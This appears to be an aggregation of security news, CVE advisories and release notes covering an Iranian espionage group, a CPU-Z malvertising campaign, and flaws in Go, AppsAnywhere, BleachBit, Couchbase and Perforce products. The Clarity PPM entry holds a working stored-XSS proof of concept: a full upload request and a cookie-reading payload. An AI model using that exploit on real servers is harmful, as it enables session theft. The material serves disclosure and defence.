A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war.
The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name Imperial Kitten, and which is also known as Crimson Sandstorm (previously Curium),

Cyber Attack / Cyber Threat

A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war.

The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name **Imperial Kitten**, and which is also known as Crimson Sandstorm (previously Curium), TA456, Tortoiseshell, and Yellow Liderc.

The latest findings from the company build on prior reports from Mandiant, ClearSky, and PwC, the latter of which also detailed instances of strategic web compromises (aka watering hole attacks) leading to the deployment of IMAPLoader on infected systems.

"The adversary, active since at least 2017, likely fulfills Iranian strategic intelligence requirements associated with IRGC operations," CrowdStrike said in a technical report. "Its activity is characterized by its use of social engineering, particularly job recruitment-themed content, to deliver custom .NET-based implants."

Attack chains leverage compromised websites, primarily those related to Israel, to profile visitors using bespoke JavaScript and exfiltrate the information to attacker-controlled domains.

Besides watering hole attacks, there's evidence to suggest that Imperial Kitten resorts to exploitation of one-day exploits, stolen credentials, phishing, and even targeting upstream IT service providers for initial access.

Phishing campaigns involve the use of macro-laced Microsoft Excel documents to activate the infection chain and drop a Python-based reverse shell that connects to a hard-coded IP address for receiving further commands.

Among some of the notable post-exploitation activities entail achieving lateral movement through the use of PAExec, the open-source variant of PsExec, and NetScan, followed by the delivery of the implants IMAPLoader and StandardKeyboard.

Also deployed is a remote access trojan (RAT) that uses Discord for command-and-control, while both IMAPLoader and StandardKeyboard employ email messages (i.e., attachments and email body) to receive tasking and send results of the execution.

"StandardKeyboard's main purpose is to execute Base64-encoded commands received in the email body," the cybersecurity company pointed out. "Unlike IMAPLoader, this malware persists on the infected machine as a Windows Service named Keyboard Service."

The development comes as Microsoft noted that malicious cyber activity attributed to Iranian groups after the start of the war on October 7, 2023, is more reactive and opportunistic.

"Iranian operators \[are\] continuing to employ their tried-and-true tactics, notably exaggerating the success of their computer network attacks and amplifying those claims and activities via a well-integrated deployment of information operations," Microsoft said.

"This is essentially creating online propaganda seeking to inflate the notoriety and impact of opportunistic attacks, in an effort to increase their effects."

The disclosure also follows revelations that a Hamas-affiliated threat actor named Arid Viper has targeted Arabic speakers with an Android spyware known as SpyC23 through weaponized apps masquerading as Skipped and Telegram, according to Cisco Talos and SentinelOne.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iran-Linked Imperial Kitten Cyber Group Targeting Middle East's Tech Sectors

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 3 and Nov. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for November 3 to November 10

On Windows, The IsLocal function does not correctly detect reserved device names in some cases. Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local. With fix, IsLocal now correctly reports these names as non-local.

path/filepath: recognize \??\ as a Root Local Device path prefix.

On Windows, a path beginning with \??\ is a Root Local Device path equivalent  
to a path beginning with \\?\. Paths with a \??\ prefix may be used to  
access arbitrary locations on the system. For example, the path \??\c:\x  
is equivalent to the more common path c:\x.

The filepath package did not recognize paths with a \??\ prefix as special.

Clean could convert a rooted path such as \a\..\??\b into  
the root local device path \??\b. It will now convert this  
path into .\??\b.

IsAbs did not report paths beginning with \??\ as absolute.  
It now does so.

VolumeName now reports the \??\ prefix as a volume name.

Join(`\`, `??`, `b`) could convert a seemingly innocent  
sequence of path elements into the root local device path  
\??\b. It will now convert this to \.\??\b.

This is CVE-2023-45283 and https://go.dev/issue/63713.

path/filepath: recognize device names with trailing spaces and superscripts

The IsLocal function did not correctly detect reserved names in some cases:

*   reserved names followed by spaces, such as "COM1 ".
*   "COM" or "LPT" followed by a superscript 1, 2, or 3.

IsLocal now correctly reports these names as non-local.

This is CVE-2023-45284 and https://go.dev/issue/63713.

/cc @golang/security and @golang/release

CVE-2023-45284: path/filepath: insecure parsing of Windows paths · Issue #63713 · golang/go

The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process.

Your trust in our products and service means the world to us, and we are committed to being proactive and keeping you informed about any security updates to our software.

As part of this proactive stance, we have released security updates for AppsAnywhere Server 2.11, 2.12, 3.0 and 3.1 (patch AA-5085) and AppsAnywhere Client (1.6.1, 2.0.1). These new releases resolve two security issues (CVE-2023-41138 / CVE-2023-41137) and we recommend all customers who haven't already applied these updates to do so by contacting our support team.

Below are the details of these two issues identified.

**AppsAnywhere macOS Client - CVE-2023-41138 - Bad privilege assignment**

**Summary**

The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process.

**Advisory release date**

2023-11-09

**Product**

AppsAnywhere Client

**Affected versions**

*   AppsAnywhere macOS client v1.4.0
    
*   AppsAnywhere macOS client v1.4.1
    
*   AppsAnywhere macOS client v1.5.1
    
*   AppsAnywhere macOS client v1.5.2
    
*   AppsAnywhere macOS client v1.6.0
    
*   AppsAnywhere macOS client v2.0.0
    

**Fixed versions**

*   AppsAnywhere Windows client v1.6.1
    
*   AppsAnywhere Windows client v2.0.1
    
*   AppsAnywhere Windows client v2.2.0 or later
    
*   AppsAnywhere macOS client v1.6.1
    
*   AppsAnywhere macOS client v2.0.1
    
*   AppsAnywhere macOS client v2.2.0 or later
    

**CVE ID(s)**

CVE-2023-41138

**CVSS**

7.5 (High) - CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Discovered by**

Gaelan Steele

**AppsAnywhere Client - CVE-2023-41137 - Cryptographic error**

**Summary**

Symmetric encryption used to protect messages between the AppsAnywhere server and client can be broken by reverse engineering the client and used to impersonate the AppsAnywhere server.

**Advisory release date**

2023-11-09

**Product**

AppsAnywhere Client

**Affected versions**

*   AppsAnywhere Windows client v1.4.0
    
*   AppsAnywhere Windows client v1.4.1
    
*   AppsAnywhere Windows client v1.5.1
    
*   AppsAnywhere Windows client v1.6.0
    
*   AppsAnywhere Windows client v2.0.0
    
*   AppsAnywhere macOS client v1.4.0
    
*   AppsAnywhere macOS client v1.4.1
    
*   AppsAnywhere macOS client v1.5.1
    
*   AppsAnywhere macOS client v1.5.2
    
*   AppsAnywhere macOS client v1.6.0
    
*   AppsAnywhere macOS client v2.0.0
    

**Fixed versions**

Fixed versions of the AppsAnywhere client **require** a compatible AppsAnywhere server version. **Older server versions are incompatible.**

Compatible server versions:

*   AppsAnywhere 2.11: 2.11 + patch AA-5085
    
*   AppsAnywhere 2.12: 2.12 + patch AA-5085
    
*   AppsAnywhere 3.0: 3.0 + patch AA-5085
    
*   AppsAnywhere 3.1: 3.1 + patch AA-5085
    
*   AppsAnywhere 3.2 and later
    

*   AppsAnywhere Windows client v1.6.1
    
*   AppsAnywhere Windows client v2.0.1
    
*   AppsAnywhere Windows client v2.2.0 or later
    
*   AppsAnywhere macOS client v1.6.1
    
*   AppsAnywhere macOS client v2.0.1
    
*   AppsAnywhere macOS client v2.2.0 or later
    

**CVE ID(s)**

CVE-2023-41137

**CVSS**

8.0 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

**Discovered by**

Gaelan Steele

CVE-2023-41138: 2023-11 security advisory

A new malvertising campaign has been found to employ fake sites that masquerade as legitimate Windows news portal to propagate a malicious installer for a popular system profiling tool called CPU-Z.
"This incident is a part of a larger malvertising campaign that targets other utilities like Notepad++, Citrix, and VNC Viewer as seen in its infrastructure (domain names) and cloaking templates used

Endpoint Security / Malware

A new malvertising campaign has been found to employ fake sites that masquerade as legitimate Windows news portal to propagate a malicious installer for a popular system profiling tool called CPU-Z.

"This incident is a part of a larger malvertising campaign that targets other utilities like Notepad++, Citrix, and VNC Viewer as seen in its infrastructure (domain names) and cloaking templates used to avoid detection," Malwarebytes' Jérôme Segura said.

While malvertising campaigns are known to set up replica sites advertising widely-used software, the latest activity marks a deviation in that the website mimics WindowsReport\[.\]com.

The goal is to trick unsuspecting users searching for CPU-Z on search engines like Google by serving malicious ads that, when clicked, redirect them to the fake portal (workspace-app\[.\]online).

At the same time, users who are not the intended victims of the campaign are served an innocuous blog with different articles, a technique known as cloaking.

The signed MSI installer that's hosted on the rogue website contains a malicious PowerShell script, a loader known as FakeBat (aka EugenLoader), which serves as a conduit to deploy RedLine Stealer on the compromised host.

"It is possible the threat actor chose to create a decoy site looking like Windows Report because many software utilities are often downloaded from such portals instead of their official web page," Segura noted.

This is far from the first time deceptive Google Ads for popular software have turned out to be a malware distribution vector. Last week, cybersecurity firm eSentire disclosed details of an updated Nitrogen campaign that paves the way for a BlackCat ransomware attack.

Two other campaigns documented by the Canadian cybersecurity firm show that the drive-by download method of directing users to dubious websites has been leveraged to propagate various malware families like NetWire RAT, DarkGate, and DanaBot in recent months.

The development comes as threat actors continue to increasingly rely on adversary-in-the-middle (AiTM) phishing kits such as NakedPages, Strox, and DadSec to bypass multi-factor authentication and hijack targeted accounts.

To top it all, eSentire also called attention to a new method dubbed the Wiki-Slack attack, a user-direction attack that aims to drive victims to an attacker-controlled website by defacing the end of the first para of a Wikipedia article and sharing it on Slack.

Specifically, it exploits a quirk in Slack that "mishandle\[s\] the whitespace between the first and second paragraph" to auto-generate a link when the Wikipedia URL is rendered as a preview in the enterprise messaging platform.

It's worth pointing out that a key prerequisite to pulling off this attack is that the first word of the second paragraph in the Wikipedia article must be a top-level domain (e.g., in, at, com, or net) and that the two paragraphs should appear within the first 100 words of the article.

With these restrictions, a threat could weaponize this behavior such that the way Slack formats the shared page's preview results points to a malicious link that, upon clicking, takes the victim to a booby-trapped site.

"If one does not have ethical guardrails, they can augment the attack surface of the Wiki-Slack attack by editing Wikipedia pages of interest to deface it," eSentire said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Malvertising Campaign Uses Fake Windows News Portal to Distribute Malicious Installers

Users looking to download a popular PC utility may be tricked in this campaign where a threat actor has registered a website that copies content from a PC and Windows news portal.

The majority of malvertising campaigns delivering malicious utilities that we have tracked so far typically deceive victims with pages that are almost the exact replica of the software vendor being impersonated. For example, we have seen fake websites appearing like the real Webex, AnyDesk or KeePass home page.

In a new campaign, we observed a threat actor copying a legitimate Windows news portal (WindowsReport.com) to distribute a malicious installer for the popular processor tool CPU-Z.

This type of website is often visited by geeks and system administrators to read the latest computer reviews, learn some tips and download software utilities. The Windows Report was never compromised and is legitimate, but rather threat actors copied its content to trick users.

This incident is a part of a larger malvertising campaign that targets other utilities like Notepad++, Citrix and VNC Viewer as seen in its infrastructure (domain names) and cloaking templates used to avoid detection. We have informed Google with the relevant details for takedown.

**Google ad and filtering**

The malicious ad is for CPU-Z, a popular utility for Windows users that want to troubleshoot their processor and other computer hardware details. The advertiser shows as Scott Cooper and is likely a compromised or fake identity.

One common technique used by threat actors to evade detection is to employ cloaking. Anyone clicking on the ad and who’s not the intended victim will see a standard blog with a number of articles.

We had previously identified another malicious ad using almost the same template.

**Redirect to Windows news site lookalike**

To show what happens when an actual victim clicks on the ad, here is the network traffic related to it as seen in the image below. This time, the corporatecomf\[.\]online website is no longer used to show a blog with articles but instead does a redirect (302 HTTP code) to another domain at workspace-app\[.\]online.

This domain uses content from the legitimate Windows portal WindowsReport.com and looks almost identical:

People who searched for CPU-Z and clicked the ad are now at the download page for the software, where they may wrongly assume that it is legitimate. The URL in the address bar does not match the real one, though.

There are several other domains hosted on the same IP address (74.119.192.188) also used in malvertising campaigns:

**Signed MSIX installer**

The payload is a digitally signed MSIX installer which contains a malicious PowerShell script, a loader known as FakeBat:

The script shows the malware command and control server as well as the remote payload (Redline stealer):

We are blocking the malvertising domains for all Malwarebytes customers:

ThreatDown, powered by Malwarebytes, already detected the final infostealer payload and we have added coverage for the its command and control servers as well.

It is possible the threat actor chose to create a decoy site looking like Windows Report because many software utilities are often downloaded from such portals instead of their official web page.

The download is also a signed MSI installer, which increases the chances for it to look legitimate from the operating system and antivirus software. These MSI loaders are quite common and allow threat actors to update the final payload by simply swapping a PowerShell script.

Software downloads have been a big target for the past year with criminals using a variety of tricks to deceive users and install malware. In an enterprise environment, it may be wise to verify a file’s checksum to ensure it has not been tampered with by comparing its SHA256 hash sum with what is posted on the vendor’s website.

**Indicators of Compromise**

Ad domains

argenferia\[.\]com  
realvnc\[.\]pro  
corporatecomf\[.\]online  
cilrix-corp\[.\]pro  
thecoopmodel\[.\]com  
winscp-apps\[.\]online  
wireshark-app\[.\]online  
cilrix-corporate\[.\]online  
workspace-app\[.\]online

Payload URLs

thecoopmodel\[.\]com/CPU-Z-x86.msix
kaotickontracting\[.\]info/account/hdr.jpg
ivcgroup\[.\]in/temp/Citrix-x64.msix
robo-claim\[.\]site/order/team.tar.gpg
argenferia\[.\]com/RealVNC-x64.msix

Payloads

55d3ed51c3d8f56ab305a40936b446f761021abfc55e5cc8234c98a2c93e99e1
9acbf1a5cd040c6dcecbe4e8e65044b380b7432f46c5fbf2ecdc97549487ca88
419e06194c01ca930ed5d7484222e6827fd24520e72bfe6892cfde95573ffa16
cf9589665615375d1ad22d3b84e97bb686616157f2092e2047adb1a7b378cc95

C2s

11234jkhfkujhs\[.\]site
11234jkhfkujhs\[.\]top
94.131.111\[.\]240
81.177.136\[.\]179

 Malvertiser copies PC news site to deliver infostealer 

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

==================================================================================================================================  
# Title     : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting   attacks.                                                     |  
# Author    : Kaizen                                                                                                       |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)                                           |  
# Vendor    : https://www.broadcom.com/                                                                                             
# Dork      : https://www.broadcom.com/products/software/value-stream-management/clarity                                      |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM

<body onload=alert(document.cookie)>

To Trigger Stored XSS visit user profile picture.

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true

CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

BleachBit cleans files to free disk space and to maintain privacy. BleachBit for Windows up to version 4.4.2 is vulnerable to a DLL Hijacking vulnerability. By placing a DLL in the Folder c:\DLLs, an attacker can run arbitrary code on every execution of BleachBit for Windows. This issue has been patched in version 4.5.0.


**Impact**

BleachBit for Windows up to Version 4.4.2 is vulnerable to a DLL Hijacking vulnerability (CWE-427).  
By placing a DLL in the Folder c:\\DLLs, an attacker can run arbitrary code on every execution of BleachBit for Windows. This affects both bleachbit.exe and bleachbit\_console.exe

The impact varies depending on the scenario.  
**Privilege Escalation**: In normal operation, BleachBit uses UAC to run in an elevated context. This means,  
that malware running in an non elevated user context can place the payload and wait till a user runs  
BleachBit. Once the Users runs BleachBit in an elevated context (which is default), the malicious payload  
also gets executed elevated.

**Persistence**: Malware can use the vulnerability as a method of persistence. Every time a user executes  
BleachBit, the malicious payload will be executed.

**Evasion**: Execute malicious payload through the process of a legitimate executable bleachbit.exe or  
bleachbit\_console.exe

**Spreading**: On a multi-user system, compromised User A will create the malicious DLL. Once user B  
executes BleachBit, the payload will be triggered.

**Patches**

_Has the problem been patched? What versions should users upgrade to?_

**Workarounds**

As an Administrator, create the directory c:\\DLLs with permissions that prevent regular (non elevated) users from creating files. This can prevent a user or malware running in its context from creating the corresponding DLL.

Upgrade to BleachBit version 4.6.0 (final) which has a workaround to refuse to start if DLL hijacking is detected.

Upgrade to BleachBit 4.4.2.2467 (alpha) which has a proper fix because it is based on Python 3.10 instead of Python 3.4

CVE-2023-47113: DLL Search Order Hijacking vulnerability in BleachBit for Windows

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

Couchbase Server 7.2.1 was released in September 2023.

**New Features**

This release includes the following new features.

**XDCR**

The following XDCR features are new:

*   XDCR replications, specified by means of the REST API, can now use the filterBinary flag. This specifies whether binary documents should be replicated. Detailed information on the filterBinary flag is provided on the REST reference page, Creating a Replication.
    
*   Using the REST API, node-connectivity can now be checked, prior to the creation of an XDCR reference. See Checking Connections.
    
*   In Couchbase Server Version 7.2.1 and later, XDCR provides enhanced information on cluster-rebalance status. See Rebalance Information
    

**Enhancements**

This release includes the following enhancements:

*   Bloom filters for the Indexing Service were not previously enabled by default. Bloom filters are now enabled by default. This change reduces the Index Service disk lookups when there are insert heavy workloads. Bloom filters are used by the index storage layer to reduce the disk i/o and improve the overall efficiency of the index service. You can disable bloom filters and opt out.
    

**Future Reserved Words**

To give you enough time to prepare ahead, we are going to add the following reserved words for features in an upcoming Couchbase Server release:

*   SEQUENCE
    
*   CACHE
    
*   RESTART
    
*   MAXVALUE
    
*   MINVALUE
    
*   NEXT
    
*   PREV
    
*   PREVIOUS
    
*   NEXTVAL
    
*   PREVVAL
    
*   CYCLE
    
*   RECURSIVE
    
*   RESTRICT
    

No action is required for upgrading to Server 7.2.1.

**New Supported Platforms**

This release adds support for the following new platforms:

*   Alma Linux 9
    
*   Rocky Linux 9
    

**Fixed Issues**

This release contains the following fixes.

**Analytics Service**

  

Issue

Description

Resolution

MB-56957

External collections could not be created using Azure Managed Identity.

Azure dependencies have been updated to correct this issue.

MB-57588

Query results could be unnecessarily converted twice to JSON when documents were large.

The Query result is now converted to JSON once for all documents.

MB-57615

When the Prometheus stats returned from Analytics exceeded four kilobytes, the status code was inadvertently set to 500 (Internal Error), and this resulted in a large number of warnings in the Analytics warning log. Couchbase Server discarded these statistics.

This has been fixed to properly return a 200 (OK) status code when the size of Prometheus stats exceeds 4KiB, allowing these stats to be recorded properly. The warning is not displayed.

**Data Service**

  

Issue

Description

Resolution

MB-39344

The last item in a replica checkpoint was not expelled. In scenarios such as large average item size, high numbers of replicas or low Bucket quota could result in a data-node entering an unrecoverable Out-of-Memory state.

ItemExpel has been enhanced to release all the items in a checkpoint when memory conditions allow.

MB-56084

A rollback loop affected legacy clients when collections were used and a tombstone newer than the last mutation in the default collection was purged.

The lastReadSeqno is now Incremented when the client is not collection-aware.

MB-56644

In rare cases, after a failover or memcached restart, a replica rollback while under memory pressure might have caused a crash in the Data Service.

Memory pressure recovery logic (Item expelling) is now skipped when replica rollback is in progress.

MB-56970

XDCR or restore from backup entered an endless loop if attempting to overwrite a document which was deleted or expired some time ago with a deleteWithMeta operation. This was due to a specific unanticipated state in memory which increased CPU usage, and connection became unusable for further operations.

deleteWithMeta is now resilient to temporary non-existent values with xattr datatype.

MB-57002

When using .NET SDK on Windows 10 client and client certs were enabled on CB Server, the Data-Service did not establish a connection and client bootstrap failed with a OpenSSL “session id context uninitialized" error.

Data-Service has been updated to disable TLS session resume.

MB-57064

GET\_META requests for deleted items fetched metadata in memory which was not evicted in value-eviction buckets.

Metadata items are now cleaned when the expiry pager runs.

MB-57106

DCP clients streamed in out-of-sequence-order \[OSO\] backfill snapshots under Magma observed duplicate documents received in the disk snapshot. This happened where the stream was paused and resumed when the resume point was wrongly set to a key already processed in the stream.

OSO backfill in Magma now sets the correct resume point after a pause.

MB-57304

Data Service rebalance duration was significantly impacted if other DCP clients created a large number of Streams, if those streams needed to be read from disk, due to the lack of prioritizing between rebalance and other DCP clients.

The number of backfills each DCP client can perform concurrently has been limited to allow fairer allocation of resources.

MB-57400

The computation count for the items remaining DCP/Checkpoint stats exposed to Prometheus was the O(N) function. Where N is the number of items in a checkpoint. This caused various performance issues including Prometheus stats timeouts when checkpoints accumulated a high number of items.

The computation count has been optimized and now is O(1).

MB-57609

A spurious auto-failover could happen when Magma compaction visited a TTL’d document that was already deleted.

Document not found does not now increment the number of read failures.

**Index Service**

  

Issue

Description

Resolution

MB-56339

During scaling, an GSI indexer rebalance froze and did not successfully complete. This was because an index snapshot was not correctly deleted and recreated.

A flag now handles snapshots to ensure they are correctly deleted or recreated when indexes are updated during rebalancing.

MB-57021

When alter index updated the replica count, new replicas were not built immediately when the original definition was {defer\_build: true}. Existing replicas were built and new replicas were built in the next processing iteration.

New replicas are now built when the replica count is updated for deferred indexes. The status of existing index instances is checked, and if ready, a new build of the instance is triggered.

MB-57777

When the indexer was unable to keep up with KV mutations, and there was a queue of mutations within the indexer, there was a large memory overhead from the bookkeeping of queued up mutations.

Indexer has been improved to optimize memory usage so that the bookkeeping overhead is reduced for queued up mutations.

**Query Service**

  

Issue

Description

Resolution

MB-56533

Due to how nested dependencies were handled, a sudden rise in memory utilization of the query service on a node caused a memory alert issue. The node did not recover correctly following a restart.

Nested dependencies are now handled appropriately in the ADVISE statement.

MB-56563

A query with multiple filters on an index key, one of which was a parameter, could produce incorrect results. This was caused by incorrectly composing the exact index spans to support the query.

The way in which exact spans are set has been modified to correct this issue.

MB-56579

Covering FLATTEN\_KEYS() on an array index generated incorrect results. This was because a modified version of the ANY clause was applied after the index which meant false positives were retained and Distinct scan rows were eliminated.

The ANY filter is now applied on an index scan itself when covering an index scan with flatten keys.

MB-56683

Inter-service read timeout errors were not detected or handled accordingly. User requests consequently failed with timeout errors without retrying with a new connection.

The error handling and retry mechanism has been modified to handle these types of timeout issues and errors.

MB-56727

Under certain circumstances, a query with UNNEST used a covering index scan and incorrect results were returned. Reference to the UNNEST expression should have prevented the covering index from being used for the query as the index did not contain the entire array.

The logic to determine covering UNNEST scans has been changed to not use a covering index scan for such queries.

MB-56937

When an index scan had multiple spans, index selectivity was incorrectly calculated.

Index selectivity for multiple index spans is now correctly calculated.

MB-57024

Incorrect results were returned for a non-IndexScan on a constant false condition. This was due to incorrect handling of a FALSE WHERE clause.

The FALSE WHERE clause is now correctly handled.

MB-57029

Querying system:functions\_cache in a multi query node cluster returned incomplete results with warnings. The query result included entries in the local query node, but none from remote query nodes. This was due to a typographical error.

The typographical error has been corrected.

MB-57080

A panic in go\_json.stateInString under parsed value functions caused by incorrect concurrent access resulted in the state being freed whilst still in use.

The concurrent access issue has been resolved.

MB-57251

A Prepared statement might have resulted in an incorrect result in a multi-node environment. For example, a database with two query nodes.

Correlated subqueries from an encoded plan are now detected and marked. This ensures correct results are provided.

MB-57279

When a WITH clause (common table expression, or CTE) was used inside a subquery, and the WITH clause definition referenced the parent query, and was correlated, the query engine did not properly detect the correlation. This produced an incorrect result from the WITH clause evaluation because the result was not cached correctly.

Correlations inside WITH clause definitions are now properly detected.

MB-57316

cbq required a client authentication key file whenever a certificate authority file was used.

cbq now accepts a certificate authority file without a client key file enabling use with username and password credentials.

MB-57680

When appropriate optimizer statistics were used in Cost-Based Optimizer (CBO), for a query with ORDER BY, if there were multiple indexes available for the query, CBO unconditionally favored an index that provided ordering. Such indexes were not always the best ones to use.

CBO now allows cost-based comparison of indexes.

MB-57838

An ADVISE statement with multiple levels of UNNEST caused a syntax error in the CREATE INDEX statement from the Index Advisor.

ADVISE has been improved when there are queries with multiple levels of UNNEST.

**Cluster Manager**

  

Issue

Description

Resolution

MB-57484

A Cluster Manager process crash meant the Delete Bucket memcached command was not always called before bucket files were deleted later in rebalance. This caused the memcached process to crash repeatedly causing data service downtime.

The Delete Bucket command is now called on memcached before a file is deleted during rebalance. This ensures mencached doesn’t attempt to read the files.

**Cross Datacenter Replication (XDCR)**

  

Issue

Description

Resolution

MB-56601

Data streamed from the Data Service over XDCR should always be streamed in order by mutation id. However, in some scenarios, for efficiency, the Data Service streamed records that were not ordered by mutation id. In certain situations, this out-of-sequence-order \[OSO\] caused performance issues.

OSO mode is now available as a global override to be switched off for any currently deployed replications to avoid performance issues.

MB-56711

XDCR did not process documents with a JSON array and Extended Attributes (XATTRs). When a document contained XATTRs, XDCR checked for XATTRs in transactions, transaction filters were enabled, and XATTRs were not checked.

When documents contain arrays, XATTRs are now checked in the transaction XATTRs, and the document is not prevented from being parsed in an array.

MB-56741

Binary documents were replicated when an Advanced Filtering Expression was present.

A filter has been added which can be turned on to prevent all binary documents from being replicated.

MB-56773

It appeared that XDCR had stalled and an explanation was not provided. For rebalances on the source or target, the XDCR pipeline should be restarted, and data movement should continue. Before the pipeline was restated, there might have been fewer data movements as the rebalanced VBs were no longer streaming.

An ETA is now provided in the Server UI to show when the pipeline is due to be restarted.

MB-56799

Checkpoint Manager created checkpoint records out-of-sequence when many target nodes ran slowly.

Checkpoint Manager now creates checkpoints in sequence when target nodes are slow.

MB-56848

The bucket topology service sent a concurrent map iteration and map write panic to XDCR which caused a fatal error.

Validation has been improved to prevent the panic from happening.

MB-56938

Prometheus stats did not include a pipeline’s status.

The pipeline status is now provided as part of a prometheus stat.

MB-57130

A Checkpoint Manager Initialization error caused two memory leak types. These were a backfill pipeline and a main pipeline memory leak.

The Pipeline Manager and backfill pipeline have both been modified to prevent the memory leaks.

MB-57183

XDCR Checkpoint Manager instances were not cleaned up under certain circumstances due to timing and networking issues when contacting target, or when an invalid backfill task was fed in as input.

Checkpoint Manager instances are now cleaned up. A flag has been added to check for invalid backfill tasks.

MB-57234

When a replication spec change was made to a non-Data Service node, delete replication hung and caused the node to return an incorrect replication configuration.

XDCR now checks that the node is running the Data Service and handles it correctly.

MB-57277

XDCR could fail due to multiple connection issues. For example, DNS issues or firewalls. For a number of databases, it was a difficult task to manually check every node to determine where the connection issue was. For multiple nodes in a database and in the target database, debugging the issue required many connection checks.

A connection pre-check feature has been added to XDCR which ensures all connections from source nodes to target nodes are valid. Credentials are now also checked.

MB-57412

Running ipv6 only mode + non-encrypted remote resulted in invalid IP addresses being returned, leading to connection issues.

A valid IP address is now returned.

MB-57462

StatsMgr stopping could hang due to watching for notifications resulting in stranded go-routines.

Go-routines are now stopped correctly.

MB-57562

When ipv4 only mode was used, and full encryption only had an alternate address configured where the internal address was unresolvable, XDCR resulted in an error when it contacted the target data nodes.

The specific scenario has been fixed so that replication can now proceed.

MB-57743

The Prometheus endpoint did not expose any XDCR error metrics.

XDCR error metrics are now exposed via Prometheus.

MB-57787

A legacy race condition where metadata store could cause a conflict was exposed as part of the binary filter improvements.

Legacy race conditions have all been resolved.

MB-58203

Under certain circumstances, when rebalancing, the target cluster could return an EACCESS error code that caused source XDCR to pause the pipeline.

This has been reversed. Instead of pausing the pipeline when rebalancing, XDCR now retries when an EACCESS error is encountered in XmemNozzle. XDCR counts and prints this activity in the log.

MB-58545

Checkpoint Manager could be stuck when stopping if it had not been started yet, resulting in memory leak.

Checkpoint Manager can now be stopped correctly even when it hasn’t been started.

**Metrics and Monitoring**

  

Issue

Description

Resolution

MB-56464

An issue occurred where the Cluster Manager instructed Prometheus to reload the configuration and the reload timeout impacted other requests.

The Cluster Manager has been improved to handle timeouts when instructing Prometheus to reload the configuration.

MB-56517

The Cluster Manager’s computed utilization stats were inaccurate due to time interval discrepancies in components where data was collected.

The Cluster Manager now reports raw stats as Prometheus counters.

**Storage**

  

Issue

Description

Resolution

MB-57157

Inconsistencies were observed where a single Magma bucket in a database took a long time to warm up.

The seq index scan has been optimized for tombstones of zero value size. Optimization is for look up by key, sequence iteration, and key iteration. Docs of 0 value size are placed in both key index and seq index.

MB-57714

Disk backfills were hanging permanently due to high memory consumption when large documents were streamed over many DCP streams concurrently.

Memory for a document read by a DCP stream is now released before switching to another stream.

**Known Issues**

**Search Service**

  

Issue

Description

Workaround

MB-58450

An issue occurs with node failover. If a user does not bring in a replacement node before the failover occurs, then lost active or lost replica search indexes that have partitions on the replaced node are not rebuilt.  
As a result, search requests return partial/incomplete results. In addition,existing indexes with defined replica(s) become vulnerable to another node failure.

This issue is only pertinent to the **7.2.1** release, and does not affect older builds.

This situation can be prevented if a replacement node was brought into the cluster in place of the failed over node, before starting the rebalance operation. This problem should not affect on-line or off-line rebalances.

If lost indexes are encountered, then, a manual update to the affected search index definition(s) will trigger a rebuild of the affected indexes.  
(The advice here is to toggle the replica count so that unaffected index partitions are re-used, and only the lost partitions are rebuilt.)

CVE-2023-36667: Release Notes for Couchbase Server 7.2

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified.  Reported by Jason Geffner.  


**Trending at Perforce**

**Explore Our Products**

**

Enterprises Who Choose Perforce Solutions...

**

Background Image

Achieve ROI within a year.

Background Image

Achieve compliance certifications in record time.

Background Image

Go from three days to 35 minutes for testing.

Background Image

Gain a competitive edge.

Background Image

Avoid security breaches.

Background Image

Innovate and deploy without risk.

Background Image

